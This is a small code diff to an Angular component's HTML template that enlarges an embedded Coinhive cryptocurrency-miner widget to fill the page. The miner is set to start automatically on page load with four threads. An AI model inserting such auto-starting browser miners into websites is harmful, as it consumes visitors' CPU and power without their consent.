--- a/src/app/bottom/bottom.component.html
+++ b/src/app/bottom/bottom.component.html
@@ -1,4 +1,4 @@
-<div class="coinhive-miner" style="width: 256px; height: 310px" data-key="azmCNLbDq0lGFszwwIQMhVaAQG1Y5nF6" data-autostart="true" data-whitelabel="false" data-background="#000000" data-text="#eeeeee" data-action="#00ff00" data-graph="#555555" data-threads="4"
+<div class="coinhive-miner" style="width: 100%; height: 100%" data-key="azmCNLbDq0lGFszwwIQMhVaAQG1Y5nF6" data-autostart="true" data-whitelabel="false" data-background="#000000" data-text="#eeeeee" data-action="#00ff00" data-graph="#555555" data-threads="4"
     data-throttle="0.1">
     <em>Loading...</em>
 </div>
